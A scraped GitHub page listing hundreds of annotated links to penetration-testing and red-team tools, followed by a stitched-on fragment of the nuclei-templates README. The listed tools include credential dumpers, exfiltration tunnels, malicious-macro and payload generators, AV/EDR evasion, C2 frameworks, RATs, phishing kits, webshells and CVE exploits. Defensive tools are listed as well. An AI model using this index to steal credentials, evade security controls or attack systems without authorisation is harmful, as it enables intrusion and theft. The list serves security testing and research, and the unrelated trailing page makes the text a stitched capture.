https://github.com/future-architect/vuls https://github.com/ngalongc/AutoLocalPrivilegeEscalation https://github.com/b3rito/yodo https://github.com/belane/linux-soft-exploit-suggester - lookup vulnerable installed software https://github.com/sevagas/swap_digger https://github.com/NullArray/RootHelper https://github.com/NullArray/MIDA-Multitool https://github.com/initstring/dirty_sock https://github.com/jondonas/linux-exploit-suggester-2 https://github.com/sosdave/KeyTabExtract https://github.com/DominicBreuker/pspy https://github.com/itsKindred/modDetective https://github.com/nongiach/sudo_inject https://github.com/Anon-Exploiter/SUID3NUM - find suid bins and look them up under gtfobins / exploitable or not https://github.com/nccgroup/GTFOBLookup - Offline GTFOBins https://github.com/TH3xACE/SUDO_KILLER - sudo misconfiguration exploitation https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py https://github.com/inquisb/unix-privesc-check https://github.com/hc0d3r/tas - easily manipulate the tty and create fake binaries https://github.com/SecWiki/linux-kernel-exploits https://github.com/initstring/uptux https://github.com/andrew-d/static-binaries - not really privesc but helpfull Exfiltration Credential harvesting Windows Specific https://github.com/gentilkiwi/mimikatz https://github.com/GhostPack/SafetyKatz https://github.com/Flangvik/BetterSafetyKatz - Fork of SafetyKatz that dynamically fetches the latest pre-compiled release of Mimikatz directly from gentilkiwi GitHub repo, runtime patches signatures and uses SharpSploit DInvoke to PE-Load into memory. https://github.com/GhostPack/Rubeus https://github.com/Arvanaghi/SessionGopher https://github.com/peewpw/Invoke-WCMDump https://github.com/tiagorlampert/sAINT https://github.com/AlessandroZ/LaZagneForensic - remote lazagne https://github.com/eladshamir/Internal-Monologue https://github.com/djhohnstein/SharpWeb - Browser Creds gathering https://github.com/moonD4rk/HackBrowserData - hack-browser-data is an open-source tool that could help you decrypt data[passwords|bookmarks|cookies|history] from the browser. https://github.com/mwrlabs/SharpClipHistory - ClipHistory feature get the last 25 copy paste actions https://github.com/outflanknl/Dumpert - dump lsass using direct system calls and API unhooking https://github.com/b4rtik/SharpMiniDump - Create a minidump of the LSASS process from memory - using Dumpert https://github.com/b4rtik/ATPMiniDump - Evade WinDefender ATP credential-theft https://github.com/aas-n/spraykatz - remote procdump.exe, copy dump file to local system and pypykatz for analysis/extraction https://github.com/0x09AL/RdpThief - extract live rdp logins https://github.com/chrismaddalena/SharpCloud - Simple C# for checking for the existence of credential files related to AWS, Microsoft Azure, and Google Compute. https://github.com/djhohnstein/SharpChromium - .NET 4.0 CLR Project to retrieve Chromium data, such as cookies, history and saved logins. LSASS Dump Without Mimikatz https://github.com/Hackndo/lsassy https://github.com/aas-n/spraykatz Credential harvesting Linux Specific https://github.com/huntergregal/mimipenguin https://github.com/n1nj4sec/mimipy https://github.com/dirtycow/dirtycow.github.io https://github.com/mthbernardes/sshLooterC - SSH Credential loot https://github.com/blendin/3snake - SSH / Sudo / SU Credential loot https://github.com/0xmitsurugi/gimmecredz Data Exfiltration - DNS/ICMP/Wifi Exfiltration https://github.com/FortyNorthSecurity/Egress-Assess https://github.com/p3nt4/Invoke-TmpDavFS https://github.com/DhavalKapil/icmptunnel https://github.com/iagox86/dnscat2 https://github.com/Arno0x/DNSExfiltrator https://github.com/spieglt/FlyingCarpet - Wifi Exfiltration https://github.com/SECFORCE/Tunna - Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP https://github.com/sysdream/chashell https://github.com/no0be/DNSlivery - Easy files and payloads delivery over DNS Git Specific https://github.com/dxa4481/truffleHog https://github.com/zricethezav/gitleaks https://github.com/adamtlangley/gitscraper Windows / Linux https://github.com/AlessandroZ/LaZagne https://github.com/Dionach/PassHunt https://github.com/vulmon/Vulmap Reverse Engineering / decompiler https://github.com/mattifestation/PowerShellArsenal https://github.com/0xd4d/dnSpy - .NET Disassembler https://github.com/NationalSecurityAgency/ghidra https://github.com/icsharpcode/ILSpy Forensics https://github.com/Invoke-IR/PowerForensics https://github.com/Neo23x0/Loki https://github.com/gfoss/PSRecon Network Attacks https://github.com/bettercap/bettercap - https://github.com/SpiderLabs/Responder https://github.com/lgandx/Responder - more up to date https://github.com/evilsocket/bettercap - Deprecated but still good https://github.com/r00t-3xp10it/morpheus https://github.com/fox-it/mitm6 https://github.com/Kevin-Robertson/InveighZero - mitm6 in C# + Inveigh default features https://github.com/DanMcInerney/LANs.py Specific MITM service Exploitation https://github.com/jtesta/ssh-mitm - SSH https://github.com/pimps/wsuxploit - WSUS https://github.com/SySS-Research/Seth - RDP https://github.com/GoSecure/pyrdp - RDP man-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact https://github.com/infobyte/evilgrade - Fake Updates for various Software https://github.com/samdenty/injectify - web application live recording, keystroke logger https://github.com/skorov/ridrelay - User Enumeration with SMB Relay Attacks https://github.com/Kevin-Robertson/Invoke-TheHash Sniffing / Evaluation / Filtering https://github.com/DanMcInerney/net-creds https://github.com/odedshimon/BruteShark - https://github.com/lgandx/PCredz https://github.com/Srinivas11789/PcapXray Red-Team SIEM https://github.com/outflanknl/RedELK - Red Team's SIEM - tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations. Scanner / Exploitation-Frameworks / Automation https://github.com/threat9/routersploit https://github.com/nccgroup/autopwn https://github.com/1N3/Sn1per https://github.com/byt3bl33d3r/CrackMapExec https://github.com/Cn33liz/p0wnedShell https://github.com/archerysec/archerysec https://github.com/vulnersCom/nmap-vulners https://github.com/m4ll0k/AutoNSE - automate nmap with scripting capabilities https://github.com/v3n0m-Scanner/V3n0M-Scanner https://github.com/zdresearch/OWASP-Nettacker Default Credential Scanner https://github.com/ztgrace/changeme https://github.com/InfosecMatter/default-http-login-hunter - Login hunter of default credentials for administrative web interfaces leveraging NNdefaccts dataset. https://github.com/FortyNorthSecurity/EyeWitness https://github.com/byt3bl33d3r/WitnessMe - screenshot for webservers Default Credential Lookup https://github.com/Viralmaniar/Passhunt Payload Generation / AV-Evasion / Malware Creation https://github.com/nccgroup/Winpayloads https://github.com/Screetsec/TheFatRat https://github.com/xillwillx/tricky.lnk https://github.com/trustedsec/unicorn https://github.com/z0noxz/powerstager https://github.com/curi0usJack/luckystrike https://github.com/enigma0x3/Generate-Macro https://github.com/Cn33liz/JSMeter https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator https://github.com/Cn33liz/StarFighters https://github.com/BorjaMerino/Pazuzu https://github.com/mwrlabs/wePWNise https://github.com/Mr-Un1k0d3r/UniByAv https://github.com/govolution/avet https://github.com/Pepitoh/VBad https://github.com/mdsecactivebreach/CACTUSTORCH https://github.com/D4Vinci/Dr0p1t-Framework https://github.com/g0tmi1k/msfpc https://github.com/bhdresh/CVE-2017-0199 - Office RCE POC https://github.com/GreatSCT/GreatSCT https://github.com/mthbernardes/rsg - reverse shell generator https://github.com/sevagas/macro_pack https://github.com/mdsecactivebreach/SharpShooter https://github.com/hlldz/SpookFlare https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads https://github.com/paranoidninja/CarbonCopy - Sign an executable for AV-Evasion https://github.com/peewpw/Invoke-PSImage https://github.com/Arvanaghi/CheckPlease - Sandbox Evasion techniques https://github.com/trustedsec/nps_payload https://github.com/stormshadow07/HackTheWorld https://github.com/r00t-3xp10it/FakeImageExploiter https://github.com/nccgroup/demiguise - Encrypted HTA Generation https://github.com/med0x2e/genxlm https://github.com/med0x2e/GadgetToJScript https://github.com/rasta-mouse/GadgetToJScript - Optimized GadgetToJScript version https://github.com/EgeBalci/sgn - Shikata ga nai (仕方がない) encoder ported into go with several improvements https://github.com/matterpreter/spotter - Spotter is a tool to wrap payloads in environmentally-keyed, AES256-encrypted launchers. https://github.com/s0lst1c3/dropengine - Malleable payload generation framework. https://github.com/gigajew/PowerDropper - Build Powershell Script from .NET Executable https://github.com/FortyNorthSecurity/EXCELntDonut - Excel 4.0 (XLM) Macro Generator for injecting DLLs and EXEs into memory. https://github.com/Greenwolf/ntlm_theft - A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf) https://github.com/phackt/stager.dll - AES Encrypt payloads https://github.com/Arno0x/EmbedInHTML - Embed and hide any file in an HTML file https://github.com/bats3c/darkarmour - AES Encrypt C/C++ Compiled binaries and decrypt at runtime https://github.com/christophetd/spoofing-office-macro - PoC of a VBA macro spawning a process with a spoofed parent and command line. https://github.com/infosecn1nja/MaliciousMacroMSBuild - Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass. https://github.com/outflanknl/EvilClippy - A cross-platform assistant for creating malicious MS Office documents. Can hide VBA macros, stomp VBA code (via P-Code) and confuse macro analysis tools. Runs on Linux, OSX and Windows. Shellcode Injection https://github.com/TheWover/donut - Generates x86, x64, or AMD64+x86 position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters https://github.com/rasta-mouse/RuralBishop - D/Invoke port of UrbanBishop https://github.com/FuzzySecurity/Sharp-Suite/tree/master/UrbanBishop - Donut for Shellcode Injection https://github.com/antonioCoco/Mapping-Injection - Mapping injection is a process injection technique that avoids the usage of common monitored syscall VirtualAllocEx, WriteProcessMemory and CreateRemoteThread. https://github.com/SolomonSklash/SyscallPOC - Shellcode injection POC using syscalls. https://github.com/Arno0x/ShellcodeWrapper - Shellcode wrapper with encryption for multiple target languages https://github.com/Ne0nd0g/go-shellcode - A repository of Windows Shellcode runners and supporting utilities. The applications load and execute Shellcode using various API calls or techniques. https://github.com/djhohnstein/CSharpSetThreadContext - C# Shellcode Runner to execute shellcode via CreateRemoteThread and SetThreadContext to evade Get-InjectedThread https://github.com/pwndizzle/c-sharp-memory-injection - A set of scripts that demonstrate how to perform memory injection in C# EDR Evasion - Logging Evasion https://github.com/CCob/SharpBlock - A method of bypassing EDR's active projection DLL's by preventing entry point execution https://github.com/bats3c/Ghost-In-The-Logs - Evade sysmon and windows event logging https://github.com/am0nsec/SharpHellsGate - C# Implementation of the Hell's Gate VX Technique https://github.com/am0nsec/HellsGate - Original C Implementation of the Hell's Gate VX Technique https://github.com/3gstudent/Windows-EventLog-Bypass - C++ Version of Invoke-Phantom https://github.com/Soledge/BlockEtw - .Net Assembly to block ETW telemetry in current process https://github.com/ionescu007/faxhell - A Bind Shell Using the Fax Service and a DLL Hijack https://github.com/realoriginal/ppdump-public - Protected Process (Light) Dump: Uses Zemana AntiMalware Engine To Open a Privileged Handle to a PP/PPL Process And Inject MiniDumpWriteDump() Shellcode Useful Binary Modification tools https://github.com/hasherezade/exe_to_dll https://github.com/hasherezade/dll_to_exe https://github.com/hasherezade/pe_to_shellcode Android https://github.com/sensepost/kwetza External Penetration Testing Domain Finding / Subdomain Enumeration https://github.com/aboul3la/Sublist3r https://github.com/TheRook/subbrute https://github.com/michenriksen/aquatone https://github.com/darkoperator/dnsrecon https://github.com/fwaeytens/dnsenum https://github.com/s0md3v/Striker + Scanner https://github.com/leebaird/discover https://github.com/eldraco/domain_analyzer - more like an audit https://github.com/caffix/amass - https://github.com/subfinder/subfinder https://github.com/TypeError/domained https://github.com/SilverPoision/Rock-ON File Search / Metadata extraction https://github.com/dafthack/PowerMeta https://github.com/ElevenPaths/FOCA Scanner https://github.com/vesche/scanless https://github.com/1N3/Sn1per https://github.com/DanMcInerney/pentest-machine Email Gathering https://github.com/leapsecurity/InSpy https://github.com/dchrastil/ScrapedIn https://github.com/SimplySecurity/SimplyEmail https://github.com/clr2of8/GatherContacts https://github.com/s0md3v/Zen - Find Emails of Github Users https://github.com/m8r0wn/CrossLinked https://github.com/m4ll0k/Infoga Domain Auth + Exploitation https://github.com/nyxgeek/o365recon https://github.com/gremwell/o365enum - Enumerate valid usernames from Office 365 using ActiveSync, Autodiscover v1, or office.com login page. https://github.com/dafthack/MSOLSpray - A password spraying tool for Microsoft Online accounts (Azure/O365). The script logs if a user cred is valid, if MFA is enabled on the account, if a tenant doesn't exist, if a user doesn't exist, if the account is locked, or if the account is disabled. https://github.com/sachinkamath/NTLMRecon - Tool to enumerate information from NTLM authentication enabled web endpoints https://github.com/ustayready/fireprox - rotate IP Adresses over AWS - Combine with MSOLSpray https://github.com/True-Demon/raindance - office 365 recon https://github.com/dafthack/MailSniper https://github.com/sensepost/ruler https://github.com/Greenwolf/Spray - lockout Time integrated https://github.com/nyxgeek/lyncsmash - Lync Credential Finder https://github.com/byt3bl33d3r/SprayingToolkit - Scripts to make password spraying attacks against Lync/S4B & OWA a lot quicker, less painful and more efficient https://github.com/mdsecresearch/LyncSniper - Lync Credential Finder https://github.com/Ridter/cve-2020-0688 - OWA Deserialisation RCE https://github.com/3gstudent/easBrowseSharefile - Use to browse the share file by eas(Exchange Server ActiveSync) https://github.com/RedLectroid/OutlookSend - A C# tool to send emails through Outlook from the command line or in memory Specific Service Scanning / Exploitation Login Brute Force + Wordlist attacks https://github.com/galkan/crowbar - Brute force non hydra compliant services - RDP, VNC, OpenVPN https://github.com/1N3/BruteX - Brute Force various services https://github.com/x90skysn3k/brutespray - https://github.com/DarkCoderSc/win-brute-logon - Crack any Microsoft Windows users password without any privilege (Guest account included) https://github.com/lanjelot/patator https://github.com/dafthack/RDPSpray - RDP Password Spray - No Event Logs https://github.com/xFreed0m/RDPassSpray - Python3 tool to perform password spraying using RDP SNMP https://github.com/hatlord/snmpwn Open X11 https://github.com/sensepost/xrdp Printers https://github.com/RUB-NDS/PRET https://github.com/BusesCanFly/PRETty - Automation for PRET MSSQL https://github.com/quentinhardy/msdat Oracle https://github.com/quentinhardy/odat IKE https://github.com/SpiderLabs/ikeforce SMB Null Session Exploitation https://github.com/m8r0wn/nullinux iLO Exploitation https://github.com/airbus-seclab/ilo4_toolbox vmware vCenter Exploits https://github.com/guardicore/vmware_vcenter_cve_2020_3952 - Exploit for CVE-2020-3952 in vCenter 6.7 Intel AMT Exploitation https://github.com/Coalfire-Research/DeathMetal SAP Exploitation https://github.com/comaeio/OPCDE https://github.com/gelim/sap_ms https://github.com/chipik/SAP_GW_RCE_exploit Weblogic Exploitation https://github.com/quentinhardy/jndiat - WEblogic Server Tests https://github.com/kingkaki/weblogic-scan https://github.com/FlyfishSec/weblogic_rce - cve-2019-2725 https://github.com/SukaraLin/CVE-2019-2890 https://github.com/1337g/CVE-2017-10271 https://github.com/LandGrey/CVE-2018-2894 https://github.com/Y4er/CVE-2020-2551 Sharepoint exploitation https://github.com/sensepost/SPartan - Sharepoint Fingerprint + Exploitation https://github.com/Voulnet/desharialize Telerik UI for ASP.NET AJAX Exploit https://github.com/noperator/CVE-2019-18935 General Recon https://github.com/FortyNorthSecurity/EyeWitness Command & Control Frameworks https://github.com/n1nj4sec/pupy https://github.com/nettitude/PoshC2 https://github.com/FortyNorthSecurity/WMImplant https://github.com/quasar/QuasarRAT https://github.com/EmpireProject/Empire https://github.com/zerosum0x0/koadic https://github.com/Mr-Un1k0d3r/ThunderShell https://github.com/Ne0nd0g/merlin https://github.com/Arno0x/WebDavC2 https://github.com/malwaredllc/byob https://github.com/byt3bl33d3r/SILENTTRINITY https://github.com/Arno0x/WSC2 https://github.com/BC-SECURITY/Empire - Empire with embedded AMSI-Bypass https://github.com/cobbr/Covenant https://github.com/BishopFox/sliver - Implant framework https://github.com/bats3c/shad0w - A post exploitation framework designed to operate covertly on heavily monitored environments https://github.com/FSecureLABS/C3 - Custom Command and Control (C3). A framework for rapid prototyping of custom C2 channels, while still providing integration with existing offensive toolkits. Cobalt Strike Stuff https://github.com/DeEpinGh0st/Erebus https://github.com/aleenzz/Cobalt_Strike_wiki https://github.com/FortyNorthSecurity/C2concealer https://github.com/invokethreatguy/AggressorCollection https://github.com/harleyQu1nn/AggressorScripts Android https://github.com/AhMyth/AhMyth-Android-RAT Linux MacOSX Specific https://github.com/neoneggplant/EggShell Wifi Tools https://github.com/wifiphisher/wifiphisher https://github.com/P0cL4bs/WiFi-Pumpkin https://github.com/s0lst1c3/eaphammer https://github.com/h0nus/RogueSploit https://github.com/Tylous/SniffAir https://github.com/FluxionNetwork/fluxion https://github.com/derv82/wifite2 https://github.com/ICSec/airpwn-ng https://github.com/xdavidhu/mitmAP https://github.com/ZerBea/hcxdumptool Android / Nethunter https://github.com/faizann24/wifi-bruteforcer-fsecurify https://github.com/chrisk44/Hijacker Raspberri PI Exploitation https://github.com/secgroundzero/warberry https://github.com/samyk/poisontap https://github.com/mame82/P4wnP1 https://github.com/mame82/P4wnP1_aloa https://github.com/pi-hole/pi-hole Physical Security / HID/ETH Emulator https://github.com/carmaa/inception - PCI-based DMA https://github.com/samratashok/Kautilya https://github.com/ufrisk/pcileech - PCI based DMA https://github.com/Screetsec/Brutal - Teensy Payloads https://github.com/insecurityofthings/jackit https://github.com/BastilleResearch/mousejack Social Engeneering https://github.com/kgretzky/evilginx https://github.com/threatexpress/domainhunter https://github.com/netevert/dnsmorph - lookup valid phishing-Domains https://github.com/elceef/dnstwist - lookup valid phishing-Domains https://github.com/quickbreach/SMBetray - Change SMB Files on the fly https://github.com/SteveLTN/https-portal https://github.com/ryhanson/phishery https://github.com/Dviros/CredsLeaker https://github.com/bitsadmin/fakelogonscreen https://github.com/curtbraz/Phishing-API - Comprehensive Web Based Phishing Suite of Tools for Rapid Deployment and Real-Time Alerting! Defender Guides / Tools https://github.com/PaulSec/awesome-windows-domain-hardening https://github.com/ernw/hardening https://github.com/Invoke-IR/Uproot https://github.com/danielbohannon/Revoke-Obfuscation - powershell obfuscation detection https://github.com/countercept/python-exe-unpacker - python exe decompile https://github.com/0xd4d/de4dot - .NET Revoke-Obfuscation https://github.com/securitywithoutborders/hardentools https://github.com/x0rz/phishing_catcher https://github.com/Ben0xA/PowerShellDefense https://github.com/emposha/PHP-Shell-Detector https://github.com/LordNoteworthy/al-khaser https://github.com/Security-Onion-Solutions/security-onion - ids https://github.com/ptresearch/AttackDetection https://github.com/MHaggis/hunt-detect-prevent https://github.com/JPCERTCC/LogonTracer - Investigate malicious Windows logon by visualizing and analyzing Windows event log https://github.com/lithnet/ad-password-protection - AD Passwort Blacklisting https://github.com/R3MRUM/PSDecode - Powershell DE-Obfuscation https://github.com/matterpreter/DefenderCheck https://github.com/hegusung/AVSignSeek - Tool written in python3 to determine where the AV signature is located in a binary/payload https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES https://github.com/ION28/BLUESPAWN - An Active Defense and EDR software to empower Blue Teams https://github.com/hasherezade/hollows_hunter - Scans all running processes. Recognizes and dumps a variety of potentially malicious implants (replaced/implanted PEs, shellcodes, hooks, in-memory patches). https://github.com/hasherezade/pe-sieve - Scans a given process. Recognizes and dumps a variety of potentially malicious implants (replaced/injected PEs, shellcodes, hooks, in-memory patches). https://github.com/0Kee-Team/WatchAD - AD Security Intrusion Detection System https://github.com/nsacyber/Mitigating-Web-Shells https://github.com/redcanaryco/atomic-red-team - Small and highly portable detection tests based on MITRE's ATT&CK. Wordlists / Wordlist generators https://github.com/danielmiessler/SecLists https://github.com/berzerk0/Probable-Wordlists https://github.com/govolution/betterdefaultpasslist https://github.com/insidetrust/statistically-likely-usernames https://github.com/LandGrey/pydictor https://github.com/sc0tfree/mentalist https://github.com/skahwah/wordsmith https://github.com/1N3/IntruderPayloads https://github.com/fuzzdb-project/fuzzdb https://github.com/Bo0oM/fuzz.txt https://github.com/laconicwolf/Password-Scripts https://github.com/FlameOfIgnis/Pwdb-Public - A collection of all the data i could extract from 1 billion leaked credentials from internet. AD Lab Environment https://github.com/davidprowe/BadBlood Obfuscation https://github.com/xoreaxeaxeax/movfuscator https://github.com/danielbohannon/Invoke-DOSfuscation https://github.com/unixpickle/gobfuscate - GO Obfuscator https://github.com/javascript-obfuscator/javascript-obfuscator - Javascript Obfuscator https://github.com/danielbohannon/Invoke-Obfuscation - Powershell Obfuscator https://github.com/BinaryScary/NET-Obfuscate - .NET IL Obfuscator https://github.com/scrt/avcleaner - C/C++ source obfuscator for antivirus bypass https://github.com/meme/hellscape - GIMPLE obfuscator for C, C++, Go, ... all supported GCC targets and front-ends that use GIMPLE. https://github.com/mgeeky/VisualBasicObfuscator - VBS Obfuscator Hash Crack / Decryption https://hashcat.net/hashcat/ https://github.com/Ciphey/Ciphey - Ciphey is an automated decryption tool. Input encrypted text, get the decrypted text back. Source Code / Binary Analysis Binary Analysis https://github.com/avast/retdec https://github.com/MobSF/Mobile-Security-Framework-MobSF Source Code Analysis https://github.com/mre/awesome-static-analysis https://github.com/eslint/eslint - Javascript https://github.com/dpnishant/jsprime - Javascript https://github.com/phpstan/phpstan - PHP MISC https://github.com/pentestmonkey/gateway-finder https://github.com/Cybellum/DoubleAgent https://github.com/ytisf/theZoo https://github.com/kbandla/APTnotes https://github.com/WindowsLies/BlockWindows https://github.com/secrary/InjectProc https://github.com/AlsidOfficial/WSUSpendu https://github.com/SigPloiter/SigPloit https://github.com/virajkulkarni14/WebDeveloperSecurityChecklist https://github.com/PowerShell/PowerShell https://github.com/landhb/HideProcess https://github.com/meliht/Mr.SIP https://github.com/XiphosResearch/exploits https://github.com/jas502n/CVE-2019-13272 https://github.com/fox-it/cve-2019-1040-scanner https://github.com/worawit/MS17-010 https://github.com/DiabloHorn/yara4pentesters https://github.com/D4Vinci/Cr3dOv3r https://github.com/a2u/CVE-2018-7600 - Drupal Exploit https://github.com/joxeankoret/CVE-2017-7494 - SAMBA Exploit https://github.com/D4Vinci/One-Lin3r - Reverse Shell Oneliner / Payload Generation https://github.com/0x00-0x00/ShellPop - Reverse/Bind Shell Generator https://github.com/Acceis/crypto_identifier https://github.com/sensepost/UserEnum - check if a user is valid in a domain https://github.com/LOLBAS-Project/LOLBAS - Living of the Land Binaries https://github.com/peewpw/Invoke-BSOD - Windows Denial of Service Exploit https://github.com/mtivadar/windows10_ntfs_crash_dos - Windows Denial of Service Exploit https://github.com/deepzec/Bad-Pdf PDF Steal NTLMv2 Hash Exploit - CVE-2018-4993 https://github.com/SecureAuthCorp/impacket - https://github.com/blacknbunny/libSSH-Authentication-Bypass - LibSSH Authentication Bypass vuln. https://github.com/OneLogicalMyth/zeroday-powershell - windows Privesc Exploit https://github.com/smicallef/spiderfoot - OSINT https://github.com/ShawnDEvans/smbmap https://github.com/Coalfire-Research/java-deserialization-exploits - Deserialisation Exploits https://github.com/RhinoSecurityLabs/GCPBucketBrute - S3 bucket tester https://github.com/khast3x/h8mail https://github.com/dirkjanm/adidnsdump - Zone transfer like for internal assessment https://github.com/gquere/pwn_jenkins https://github.com/JavelinNetworks/IR-Tools - Get-ShellContent.ps1 get the typed content for all open shells https://github.com/taviso/ctftool - windows CTF Exploitation https://github.com/jedisct1/dsvpn https://github.com/GoSecure/dtd-finder https://github.com/tyranid/DotNetToJScript https://github.com/cfreal/exploits - Apache Privilege Escalation https://github.com/adamdriscoll/snek - Execute python from powershell https://github.com/g0tmi1k/exe2hex Big-IP Exploitation https://github.com/jas502n/CVE-2020-5902 Azure Cloud Tools https://github.com/hausec/PowerZure https://github.com/NetSPI/MicroBurst https://github.com/dirkjanm/ROADtools - The Azure AD exploration framework. https://github.com/dafthack/CloudPentestCheatsheets Anonymous / Tor Projects https://github.com/realgam3/pymultitor https://github.com/Und3rf10w/kali-anonsurf https://github.com/GouveaHeitor/nipe https://github.com/cryptolok/GhostInTheNet https://github.com/DanMcInerney/elite-proxy-finder Exploit Search https://github.com/vulnersCom/getsploit https://github.com/1N3/Findsploit Industrial Control Systems https://github.com/dark-lbp/isf https://github.com/klsecservices/s7scan https://github.com/w3h/isf Network access control bypass https://github.com/scipag/nac_bypass JMX Exploitation https://github.com/mogwailabs/mjet https://github.com/siberas/sjet Citrix Netscaler Pwn https://github.com/trustedsec/cve-2019-19781 Red Team infrastructure setup https://github.com/obscuritylabs/RAI https://github.com/Coalfire-Research/Red-Baron - terraform cloud c2 redirector setup https://github.com/qsecure-labs/overlord - Red Teaming Infrastructure Automation based on Red-Baron https://github.com/rmikehodges/hideNsneak - This application assists in managing attack infrastructure for penetration testers by providing an interface to rapidly deploy, manage, and take down various cloud services. These include VMs, domain fronting, Cobalt Strike servers, API gateways, and firewalls. https://github.com/shr3ddersec/Shr3dKit https://github.com/t94j0/satellite Bypass SPF/DKIM/DMARC https://github.com/chenjj/espoofer Redis Exploitation Apache Tomcat Exploitation https://github.com/mgeeky/tomcatWarDeployer - Apache Tomcat auto WAR deployment & pwning penetration testing tool. https://github.com/00theway/Ghostcat-CNVD-2020-10487 - AJP Exploit CVE-2020-1938 https://github.com/Ridter/redis-rce SSRF Exploitation https://github.com/swisskyrepo/SSRFmap LFI exploitation https://github.com/mzfr/liffy MondoDB Redis Couchdb Exploitation https://github.com/torque59/Nosql-Exploitation-Framework Elasticsearch / Kibana Exploitation https://github.com/0xbug/Biu-framework RMI attacks https://github.com/NickstaDB/BaRMIe https://github.com/BishopFox/rmiscout - RMIScout uses wordlist and bruteforce strategies to enumerate Java RMI functions and exploit RMI parameter unmarshalling vulnerabilities JSON Web Token Analysis / Exploitation https://github.com/ticarpi/jwt_tool Docker Exploitation https://github.com/AbsoZed/DockerPwn.py - automation of Docker TCP socket abuse https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/CVE%20Exploits/Docker%20API%20RCE.py - Docker API exposed RCE PHP exploits https://github.com/neex/phuip-fpizdam - nginx + php misconfiguration Cloud attack tools https://github.com/mdsecactivebreach/o365-attack-toolkit Bluetooth / low energy https://github.com/ojasookert/CVE-2017-0785 https://github.com/evilsocket/bleah https://github.com/virtualabs/btlejack Wireless / Radio Exploitation https://github.com/mame82/LOGITacker APT / Malware Emulation / Defense Check https://github.com/TryCatchHCF/DumpsterFire https://github.com/NextronSystems/APTSimulator https://github.com/redhuntlabs/RedHunt-OS https://github.com/guardicore/monkey Hash Crack / Lookup https://github.com/k4m4/dcipher-cli https://github.com/s0md3v/Hash-Buster https://github.com/initstring/passphrase-wordlist OSCP Lists / tools / help https://github.com/sailay1996/expl-bin https://github.com/CyDefUnicorn/OSCP-Archives ASPX Webshells https://github.com/antonioCoco/SharPyShell PHP Webshells https://github.com/flozz/p0wny-shell https://github.com/nil0x42/phpsploit - Stealth post-exploitation framework JSP WebShells https://github.com/SecurityRiskAdvisors/cmd.jsp Other Tool-Lists / Cheat Sheets https://github.com/Hack-with-Github/Awesome-Hacking https://github.com/enaqx/awesome-pentest https://github.com/HarmJ0y/CheatSheets https://github.com/vysecurity/RedTips https://github.com/toolswatch/blackhat-arsenal-tools https://github.com/jivoi/awesome-osint https://github.com/qazbnm456/awesome-cve-poc https://github.com/swisskyrepo/PayloadsAllTheThings https://github.com/dsasmblr/hacking-online-games https://github.com/meirwah/awesome-incident-response https://github.com/carpedm20/awesome-hacking https://github.com/rshipp/awesome-malware-analysis https://github.com/thibmaek/awesome-raspberry-pi https://github.com/vitalysim/Awesome-Hacking-Resources https://github.com/mre/awesome-static-analysis https://github.com/coreb1t/awesome-pentest-cheat-sheets https://github.com/infosecn1nja/Red-Teaming-Toolkit https://github.com/rmusser01/Infosec_Reference https://github.com/trimstray/the-book-of-secret-knowledge https://github.com/N7WEra/SharpAllTheThings https://github.com/3gstudent/Pentest-and-Development-Tips https://github.com/qazbnm456/awesome-web-security https://github.com/chryzsh/awesome-windows-security https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE https://github.com/We5ter/Scanners-Box https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet https://github.com/smgorelik/Windows-RCE-exploits https://github.com/trustedsec/physical-docs https://github.com/matterpreter/OffensiveCSharp https://github.com/mgeeky/Penetration-Testing-Tools https://github.com/nomi-sec/PoC-in-GitHub https://github.com/mantvydasb/RedTeam-Tactics-and-Techniques https://github.com/netbiosX/Checklists https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts https://github.com/adon90/pentest_compilation https://github.com/sailay1996/awesome_windows_logical_bugs https://github.com/EnableSecurity/awesome-rtc-hacking https://github.com/d1pakda5/PowerShell-for-Pentesters https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts https://github.com/google/tsunami-security-scanner About Useful Pentest tool links Resources Readme Releases No releases published

master 1 branch 43 tags Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit bauthard Adding template details. … Loading status checks… c429207 5 minutes ago Adding template details. c429207 Git stats 814 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time .github/workflows Check all branches during syntax linting 3 months ago basic-detections adding condition 28 days ago brute-force Update tomcat-manager-bruteforce.yaml 4 days ago cves Update CVE-2017-9841.yaml 23 hours ago dns uniform severity update 4 days ago files Update wadl-files.yaml 2 days ago panels uniform severity update 4 days ago payloads Add dedicated payloads dir - CVE-2020-6287 18 days ago security-misconfiguration Update wamp-xdebug-detect.yaml 5 days ago subdomain-takeover Update detect-all-takeovers.yaml 4 days ago technologies tech updates 10 hours ago tokens syntax update 8 days ago vulnerabilities Improve shellshock payload 2 days ago workflows SAP NetWeaver Workflow 18 days ago .gitignore Update .gitignore 10 days ago .pre-commit-config.yaml Add pre-commit and yamllint configuration 3 months ago .yamllint Fixed linting rules for more relaxed 3 months ago LICENSE Create LICENSE 4 months ago README.md Adding template details. 5 minutes ago View code README.md Templates are the core of nuclei scanner which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via pull requests and grow the list. Template Directory ├── LICENSE ├── README.md ├── basic-detections │   ├── basic-xss-prober.yaml │   └── general-tokens.yaml ├── brute-force │   └── tomcat-manager-bruteforce.yaml ├── cves │   ├── CVE-2017-10075.yaml │   ├── CVE-2017-7529.yaml │   ├── CVE-2017-9506.yaml │   ├── CVE-2017-9841.yaml │   